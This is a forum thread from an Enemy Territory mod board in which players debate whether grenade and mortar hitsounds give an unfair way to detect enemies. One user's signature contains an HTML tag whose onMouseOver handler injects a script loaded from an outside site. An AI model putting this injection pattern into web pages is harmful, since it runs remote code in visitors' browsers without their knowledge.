hitsounds stuff..

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

squadjot

hitsounds stuff..

Post by squadjot »

Please, remove hitsounds from nades..its ridicilous result from adding hitsounds to the game ,which was imo wrong in the first place, (yeah bring me the flaming..i dont care..hitsounds NOT suited for ET) Hitsounds on the nades, actually makes the nades work as "NME detectors"

greets, jot
=FF=im2good4u

Post by =FF=im2good4u »

yep yep if i cant see some1 on a roof ill trow a nade and if i hear bing i know where he stand lol

but if you dont like it then turn it off :D b_hitsounds 0

if you hate it so bad thne covince leuges do sv_cvar b_hitsonuds EQ 0 :roll:
wntrmt

Post by wntrmt »

heh, interesting. i find the grenade hitsounds especially useful; quite often you use nades because you have NO line of sight to the enemy (throwing over walls usually). Unless you kill someone with your nade you have no idea whether you actually hit or not.

And the nade hitsound doesn't help you at all since players being hit by a nade tend to move afterwards ;) It's just helpful to control whether your intuitive nade-aiming was correct or not. I like it.
dA*Rogue

Post by dA*Rogue »

but if you dont like it then turn it off b_hitsounds 0
Well done on the stupid reply, again.

This doesn't stop the enemies from using their nades as 'nme detectors'. I agree it's probably an unintended consequence, and while I love the flamer hitsounds, perhaps hitsounds should just apply to 'small arms' (ie. pistols, smg's, etc).
squadjot

Post by squadjot »

its just a fact that it affects gameplay, i personally dont think its 'right', and i dont think it was intended either.

i can ACCEPT hitsounds (except nade :P)... ,but as i mentioned, dont think hitsounds fit the game at all... its too late now, i guess.."implemented..people has gotten used to it..blbalbalba.. "

..but about the nade hitsound..people are talking about full holds on goldrush..but how many doesent recognize the situation off just being Axis and just spawned at bankspawn, you prime a nade and throw it up the bridge...... (PLONG) u wont necesarily kill anyone..but u can sure hear if someone is there!

i know its "bothway"-issue ..but in *most cases i actually see it to the defenders advantage because, ..as the Attacker(allied) more or less already know where the Defenders(Axis) will be.. Defenders on the other hand does not know precisely when the Allied will strike..but grenades will warn you if they are near

Detect-nading™ ^^, will also reveal if Allied are gathering,. (waiting for players/giving supply's)..for an example in the "little stair house" as we call it :P...near the backyard at barrier 2... again..i know it can be used against Defenders also... tho i dont think its quite the same..
B4tt3rY

Post by B4tt3rY »

there available to EVERYONE so its not ur at like a disadvantage to the nxt guy
SickBoy

Post by SickBoy »

B4tt3rY wrote:there available to EVERYONE so its not ur at like a disadvantage to the nxt guy
That's the argument that was used to get the spawntimer in future etpro versions. Maybe soon an aimbot that anyone can use, that would be a fair addition too. Or a pre-scripted mortarbot where you have to click on the command map, as long as it's available to anyone.

(just to point out that argument is pretty stupid)

So much stuff gets added that if you don't use/abuse it all you're at a disadvantage. Not that I am against hitsounds, on the contrary, I can't play without them anymore, but a bit more thought should have gone into it before adding them.

The nade hit detection is really on the edge of being a cheat, and once again, something that favours defense.
bani
Site Admin

Post by bani »

what do you think of landmine kill messages then? you can detect enemies clear across the other side of the map unreachable by grenades.
Rain

Post by Rain »

Not a very good analogy, because a) landmines are a passive(-ish) weapon, and b) we don't play hitsounds for landmines.
:P
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Dubya

Post by Dubya »

I also think that hitsounds should be removed for anything that isn't a bullet, or alternatively for anything that isn't in the shooter's line-of-sight.

Great feature, though. I can't imagine playing ET without a steady backbeat of "ping ping!"
bani
Site Admin

Post by bani »

since rtcw beta, you could always tell if you hit or not via tracers. shooting through smoke wasnt a problem, just look at the tracers.

tracer = hit
no tracer = no hit

the hitsounds just make it explicit.
ouroboro

Post by ouroboro »

Remove the sounds from 'nades and mortars, and have a nice day!
Please direct all gameplay-changing feature requests here.
>>steven!

Post by >>steven! »

isnt that what everyone was on about anyway :S hitsounds r a good thing imo, but for nades and mortar it may aswell be a type of hack.
bani
Site Admin

Post by bani »

SickBoy wrote:The nade hit detection is really on the edge of being a cheat, and once again, something that favours defense.
wonder how it favors defense, since it's usually offense who's in the dark about players camping the objective hidden around a corner.
ouroboro

Post by ouroboro »

let's not split hairs. the point is, it's more or less a wallhack, heh. if u wanna make it so WOUNDED men cry out in pain, not just "dead" men, then perhaps one could argue that tossing a nade in a window and listening for the cries of the wounded is a legit tactic. but i've never heard of any race of humans who beeped when they were hurt...

in short? a real mortarman has no way of knowing whether or not he hit his target other than the reports of his frontline teammates via radio comms. he doesnt hear a bell when he gets lucky...
Please direct all gameplay-changing feature requests here.